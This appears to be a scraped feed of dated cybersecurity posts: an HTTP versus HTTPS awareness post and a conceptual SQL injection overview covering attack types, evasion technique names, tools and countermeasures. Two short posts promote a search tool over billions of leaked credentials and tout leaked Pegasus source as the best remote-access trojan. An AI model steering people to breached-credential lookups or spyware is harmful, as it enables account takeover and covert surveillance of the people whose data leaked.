28/03/2025
⚠️ Stay Safe Online! The Difference Between HTTP & HTTPS 🔒
Ever wondered why some websites start with HTTP while others have HTTPS? This simple difference can impact your online security in a BIG way!
📌 HTTP (HyperText Transfer Protocol):
Data is sent without encryption ❌
Hackers can easily intercept your passwords & personal info! 🕵️♂️💀
📌 HTTPS (HyperText Transfer Protocol Secure):
Encrypts your data using SSL/TLS ✅
Even if hackers intercept your info, they only see random characters instead of your actual password! 🔐💡
💡 Always check for HTTPS before entering sensitive information like passwords, banking details, or personal data! A small "S" can make a HUGE difference in keeping your information safe.
🔁 Share this to spread awareness and help others stay secure online! 💙
---
Explanation of the Image:
This infographic illustrates the difference between HTTP and HTTPS with a simple example:
1️⃣ The top section (HTTP) shows a user (Himani) logging into a website that uses HTTP.
Her password "abc123" is sent unencrypted over the internet.
A hacker can easily read the password in plain text.
2️⃣ The bottom section (HTTPS) features another user (Gaurav) using HTTPS.
His password is encrypted before being transmitted.
Even if a hacker intercepts the data, they will only see random, unreadable characters instead of the actual password.
Conclusion: Always use websites with HTTPS for secure transactions and data protection! 🚀
26/04/2024
Leaked passwords database search tool
Search by 3,2 billions leaked credentials by:
- email
- nickname
- password
(you can also try searching by mobile number, as some people use it as a password)
https://proxynova.com/tools/comb/
25/04/2024
Pegasus source code has been leaked and it’s by far the best rat available on the internet with more unique features
24/04/2024
💰Bug Hunting Methodology 🔥
Follow us: Astra
🔖
18/04/2024
🌐Top 30 Cybersecurity Search Engines
🔖
18/04/2024
What Are The Advantages Of A
🔖
15/04/2024
⚠️SQL INJECTION:
🔥Objectives:
- SQL Injection Concepts
- Types of SQL Injection
- SQL Injection Methodology
- SQL Injection Tools
- Evasion Techniques
- SQL Injection Countermeasures
SQL Injection Concepts
SQL Injection Attack uses SQL websites or web applications. It relies on strategically injecting malicious code or scripts into existing queries. This malicious code is drafted to reveal or manipulate data stored in the tables within a database. SQL injection is a powerful and dangerous attack. It identifies the flaws and vulnerabilities in a website or application. The fundamental concept of SQL injection is to inject commands to reveal sensitive information from the database. Hence, it can result in a high-profile attack.
Types of SQL Injection
💫🔥SQL Injections can be classified into three major categories:
In-band SQLi
Inferential SQLi
Out-of-band SQLi
💫🔥In-band SQL Injection
In-band SQL Injection includes injection techniques that use the same communication channel to launch an injection attack and to gather information from the response. In-band injection techniques include:
💫🔥 Error-based SQL Injection. Injection Error-based SQL Injection is an in-band SQL injection technique. It relies on error messages from the database server to reveal information about the structure of the database. Error-based SQL injection is very useful for an attacker to enumerate an entire database. Error messages are used during the development phase to troubleshoot issues. These messages should be disabled when an application website is live. Error-based SQL injection can be performed using the following techniques:
💫🔥 Union-based SQL Injection. Union-based SQL Injection is another in-band SQL injection technique that involves using the UNION SQL operator to combine the results of two or more SELECT statements into a single result.
💫🔥Inferential SQL Injection (Blind Injection)
No data is transferred from a web application in an Inferential SQL Injection. These are referred to as Blind Injections because the attacker cannot see the results of an attack; they simply observe the server's behavior. The two types of inferential SQL injection are:
💫🔥 Boolean-based Blind SQL Injection
Time-based Blind SQL Injection.
Boolean Exploitation Technique. Blind SQL injection is the technique of sending a request to a database. The response is either true or false, so it does not contain any database data. By observing the HTTP response, the attacker can evaluate it and infer whether the injection was successful or unsuccessful.
💫🔥Out-of-band SQL Injection
Out-of-band SQL Injection is a technique that uses different channels to launch the injection and to gather the response. It requires some features to be enabled, for example, DNS or HTTP requests on the database server; hence, it is not very common.
SQL Injection Methodology
💫🔥Information Gathering and SQL Injection Vulnerability Detection
In the Information Gathering phase, information about the web application, Operating System, database, and the structure of the components is collected. Evaluation of the extracted information is useful for identifying vulnerabilities that can be exploited.
💫🔥Launch SQL Injection Attacks
An appropriate SQL injection attack can be initiated just after gathering information about the structure of a database and the vulnerabilities found. An injection succeeds by exploiting them.
💫🔥How can SQL Injection be Prevented?
Open Worldwide Application Security Project (OWASP) SQL Injection Cheat Sheet
Use Input Validation
Use a Web Application Firewall (WAF)
Use parameterized Queries
Use Whitelist instead of Blacklist
Sanitize Encode user-Provided Inputs
💫🔥Evasion Techniques
To secure a database, it is recommended that deployment is isolated in a secure network location with an Intrusion Detection System (IDS). IDS continually monitors the network and host traffic and database applications. Using different evasion techniques, the attacker has to evade IDS to access the database.
💫🔥Types of Signature Evasion Techniques:
Inserting Inline Comments between Keywords
Character Encoding
String Concatenating
Obfuscating Codes
Manipulating White Spaces
Hex Encoding
Sophisticated Matches
💫🔥Countermeasures
Several detection tools are available to mitigate SQL injection attacks. These tools test websites and applications, report the data and issues, and take remediation action. Some of these advanced tools also offer a technical description of the issue.
💫🔥Other SQL Injection Countermeasures
Limit the length of user input
Use custom error messages
Monitor DB traffic using an IDS, WAF
Disable commands like xp_cmdshell
Isolate database server and web server
Always use method attribute set to POST and low privileged account for DB connection
Run database service account with minimal rights
Move extended stored procedures to an isolated server
Use typesafe variables or functions such as IsNumeric to ensure type safety
Validate and sanitize user inputs passed to the database
💫🔥SQL Injection Tools
BSQL
SQLmap
SQLninja
BSQL Hacker
Marathon Tool
SQL Power Injector
Havij
05/05/2024
27/04/2024
26/04/2024
25/04/2024
24/04/2024
21/04/2024
18/04/2024
18/04/2024